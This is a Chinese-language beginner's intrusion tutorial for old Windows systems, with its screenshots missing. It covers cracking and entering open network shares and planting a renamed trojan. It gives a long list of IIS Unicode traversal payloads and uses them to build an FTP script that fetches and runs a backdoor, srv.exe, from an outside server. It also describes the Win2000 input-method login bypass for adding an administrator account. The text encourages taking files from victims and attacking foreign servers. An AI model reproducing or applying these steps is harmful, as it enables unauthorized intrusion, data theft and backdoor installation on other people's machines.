黑客入门者初级攻击手册（图文）

共用入侵

共用入侵是利用对方的共用的硬碟进入对方电脑，然后利用一些木马程式进一步控制对方的电脑。

既然共用入侵，当然要找到有共用的机器了，在这里我介绍简单实用的扫描共用机器的工具Shed，下面是运行的介面：



我们在Start IP里输入开始的IP，在Stop IP里输入终止的IP然后点GO即可。下图是我扫描一段IP的图像：



这里已经搜索到了有共用的机器。我们可以点击相应盘符进入对方的硬碟，呵呵进去看看有什么好东东DOWN下来吧，在这里我们已经可以像操作自己的硬碟一样操作他的硬碟。到时记得告诉我一下哦~~~~~到了这一步看看他的硬碟可不可以写？如果可以的话，嘿嘿~~我们就能进一步控制了，当然是上传一个已经改档案名和改了图示木马程式(不要告诉我不会上传！！推荐用冰河)，就等他运行后啦~~~~~

上面只是对没有设置密码的共用进行入侵，但是如果对方设置了密码怎么办呢？哈哈正所谓道高一尺，魔高一丈！！！方法有二：第一种是通过修改过的VXD文件。第二种是通过工具进行破解。虽然是两种方法但是原理都是：因为WINDOWS9X（对NT，2000无效）的共用密码都有一个BUG，就是只对密码的第一个密码进行检测。而不管后面的密码。第一种方法不推荐使用，毕竟要试200多次，谁都没有这种耐心。所以在这里也只讲第二种方法，我们要用到一个软体：Pqwak。下图是运行的介面：





在IP栏里输入你要破解的IP，Share栏里输入你要破解的共用名称，在Resolve Name里打勾可以查出他的机器名。然后点Crack后就等密码出来了。下图是我破解的图像：



我这里的密码是：RIJCM，要破解的是C盘，IP是：172.26.130.3，机器的名称是DELL1

现在有密码的共用资讯我们也可以进去了。下面我们学深一点的，毕竟只玩这个没有什么意思!!


UNICODE漏洞的利用

NT在出现了UNICODE漏洞后，入侵就变得简单容易而且有效了。



UNICODE的原理我就不讲了，有兴趣的朋友到网上找找，我们要下手当然要有目标了，要找目标当然用到了扫描器，，呵呵，，UNICODE的扫描工具有很多，这里我推荐用两RangeScan，这个用起来比较方便，可以随便输入你所设定的代码进行扫描。下图是RangeScan的运行介面：

在FORM里输入开始IP，在TO输入结束IP~~~~线程就不用管它了，然后在“扫描内容”里输入你要扫描的代码，下面是代码：

/scripts/..%c1%1c../winnt/system32/cmd.exe

/scripts/..%c1%9c../winnt/system32/cmd.exe

/scripts/..%e0%80%af../winnt/system32/cmd.exe

/scripts/..%c1%9c../..%c1%9c../..%c1%9c../WINNT/SYSTEM32/cmd.exe

/_vti_bin/..%c1%9c../..%c1%9c../..%c1%9c../WINNT/SYSTEM32/cmd.exe

/IISADMPWD/..%c1%9c../..%c1%9c../..%c1%9c../WINNT/SYSTEM32/cmd.exe

/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe

/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe

/scripts/..%c0%af../winnt/system32/cmd.exe

/scripts/..%c1%pc../winnt/system32/cmd.exe

/scripts/..%c0%9v../winnt/system32/cmd.exe

/scripts/..%c0%qf../winnt/system32/cmd.exe

/scripts/..%c1%8s../winnt/system32/cmd.exe

/scripts/..%c1%af../winnt/system32/cmd.exe

/scripts/..%f0%80%80%af../winnt/system32/cmd.exe

/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe

/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe

/msadc/..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe

/scripts/..%255c..%255cwinnt/system32/cmd.exe

/scripts/..%%35c..%%35cwinnt/system32/cmd.exe

/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe

/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe

其中这几内经常出现：

/scripts/..%c1%1c../winnt/system32/cmd.exe

/scripts/..%c1%9c../winnt/system32/cmd.exe

下面两种是最新的，，有很多美国的机器都没有打上补丁，可以试试

/scripts/..%255c..%255cwinnt/system32/cmd.exe

/scripts/..%%35c..%%35cwinnt/system32/cmd.exe

输入完代码后，就点扫描就可以了，先去跟MM聊聊先，，一会回来就有结果出来。

哈哈哈~今天的运气真不错，得了好多有这些漏洞的主机，看下图：



在这里我们假设172.26.130.235这台机器有这个/scripts/..%c1%1c../winnt/system32/cmd.exe编码的漏洞。如图：



嘿嘿，我们现在已经可以改的首页了。但这不是我们的目标。我们的目标是进入主机。

开始行动，做个FTP上传的档，必需的条件：有一个FTP伺服器(可以申请一些免费可以用FTP主页空间，如网易)。我这里的FTP伺服器是：172.26.130.237。到时应用你把它换成你的FTP伺服器IP即可。

在IE里输入：http://172.26.130.235/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+open+172.26.130.4>rijcm.txt 这条命令是打开FTP伺服器!!!!注意红色的引号!!!!!!!必须要打上，否则建立不了档!!!!!!!!!

回车后IE返回下面的资讯如图：



如果有这个提示证明我们建立rijcm.txt这个档已经成功了。看下图



然后我们依次输入以下资讯：

http://172.26.130.235/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+rijcm>>rijcm.txt

这条命令是输入用户名,我的用户名是：rijcm

http://172.26.130.235/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+rijcm>>rijcm.txt

这条命令是输入密码,我的密码是：rijcm

http://172.26.130.235/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+bin>>rijcm.txt

这条命令是用二进位方式上传档

http://172.26.130.235/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+get+srv.exe>>rijcm.txt

这条命令是上传srv.exe文件

http://172.26.130.235/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+bye>>rijcm.txt

这条命令是退出FTP

http://172.26.130.235/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+type+rijcm.txt

我们用type命令检查我们刚刚建立的档是否有错误。如下图：






注意红色的>>，刚刚我们上面输入的是一个>。现在我们输入的是两>。在这里我解释一下。当输入一个>时，表示对当前的档覆盖或者建立的操作。当输入的是两个时，表示对当前的档进行追加内容的操作。也就是保留原来的内容上再加上新的内容。

这样我们建立的rijcm.txt档已经完成了。我们只要用FTP运行这个文体档即可上传srv.exe文件。用以下命令可以上传srv.exe文件

http://172.26.130.235/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ftp+-s:rijcm.txt

稍等一下就上传完了。然后telnet 172.26.130 99进去玩吧。但是要注意这个srv.exe的工具，运行一次只能用一次，下一次只能再次运行。


输入法漏洞的利用

由于只有在简体中文的WIN2000系统才有这个漏洞，所以希望大家不要以此来攻击国内的伺服器。我们是远端入侵，所以不能物理接触伺服器。因此我们要利用WIN2000的超级终端服务，它使用的埠是3389，所以我们又用到了扫描工具（怎么都要扫描呀。烦！！）我经常使用的是代理猎手。个人觉得这个扫描速度和准确性都不错。要扫描的埠里填入3389即可。因为这里要扫描国内的机器，所以就不放图像上去了：）

首先使用代理猎手，搜索一段IP的3389埠，然后看哪些是开的。我们假设IP：172.26.130.4的3389埠是开的。我们先装个WIN2000的终端程式，然后在终端程式的伺服器栏里输入：172.26.130.4，点击连接即可。如图：







等一会就出现了我们熟悉的WIN2000登录介面。这时我们就在用户名点一下，如图：



现在我们就按CTRL+SHIFT切换输入法，我们切换到全拼和郑码都可以。如果没有这两种输入法，那换到下一台机器吧。正好我们这台有这两种输入法。对住全拼输入法的视窗标志点右键，然后选择帮助，再选择操作指南。看下图：




点操作指南后出现了一个新的视窗，用右键点击标题栏(顶上蓝色的地方)，出现一个功能表，点击中“跳至”出现一个新的视窗。





在“跳至该URL(J)：”栏里输入c:\winnt\system32(这里他的WIN2000是装在C盘的WINNT目录下，有些机器不一定是在这个目录下，到时可以自己查看一下他装WIN2000是哪什么目录。)进入后我们找到net.exe文件，然后对着net.exe点击右键出现功能表，选择创建快捷方式。找到我们刚刚创建的快捷方式后对住点击右键出现功能表，选择属性出现一个视窗如图：



这时因为我们的许可权是:administrator，所以我们可以用NET的命令来创建一个用户，并把他加入administrators组里。

创建用户的命令是：net.exe user rijcm hack /add (这时我们创建的用户是rijcm 密码是hack)

把用户加入administrators组里的命令：net localgroup administrators rijcm /add

在这里我们创建一个用户，我们只需要在net.exe后加入user rijcm hack /add一个名为RIJCM的用户我们就已经创建了。确定退出后，运行刚刚那个快捷方式(不要告诉我你不行运行？？只需要点到NET.exe的快捷方式，回车一下就可以，为保险多回几次车吧。。)

运行后，再对快捷方式点右键、出现功能表点属性。在net.exe后面输入

localgroup administrators rijcm /add即可，这样我们已经创建了一个名为：rijcm密码为：hack的用户。退出用刚刚创建的用户登录吧。。。。。。。。。。。。要记住这因为是对简体中文的WIN2000才有效，所以不要对国内的伺服器进行攻击，如果有时间的话你可以帮他们检测一下，发现漏洞通知网管，做个好人。说不定网管还请你吃饭呢~~~~~~到时记得叫上我呀!!

以上举例用到的三个软体shed1.0 RangeScan Pqwak v2.0